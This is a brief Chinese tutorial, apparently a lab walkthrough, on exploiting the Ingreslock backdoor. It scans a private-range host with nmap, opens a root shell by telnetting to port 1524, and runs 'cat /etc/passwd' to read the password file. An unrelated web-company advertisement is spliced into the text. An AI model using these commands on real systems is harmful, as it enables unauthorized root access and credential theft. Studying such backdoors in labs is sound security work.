189 8069 5689

Ingreslock后门漏洞

利用telnet命令连接目标主机的1524端口,直接获取root权限。

目前成都创新互联已为千余家的企业提供了网站建设、域名、网络空间、成都网站托管、企业网站设计、色尼网站维护等服务,公司将坚持客户导向、应用为本的策略,正道将秉承"和谐、参与、激情"的文化,与客户和合作伙伴齐心协力一起成长,共同发展。

Ingreslock后门程序监听在1524端口,连接到1524端口就可以直接获得root权限, 经常被用于***一个暴露的服务器

 一、利用nmap工具扫描目标主机

1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。

1.2在终端中输入命令“nmap –sV  192.168.1.3”,对目标主机进行端口扫描,发现开放1524端口。

Ingreslock后门漏洞

1.3在终端中输入命令“telnet 192.168.1.3 1524”,连接目标主机1524端口,先是连接成功。如图3所示

1.4在终端中输入命令“whoami”,查找获取的权限。如图4所示

Ingreslock后门漏洞

1.5在终端中输入命令“ifconfig eth0”,查看网卡信息,在终端下输入“cat /etc/passwd”,查看远程主机的密码文件。

Ingreslock后门漏洞

Ingreslock后门漏洞


新闻名称:Ingreslock后门漏洞
链接URL:http://cdxtjz.cn/article/ggchoj.html

其他资讯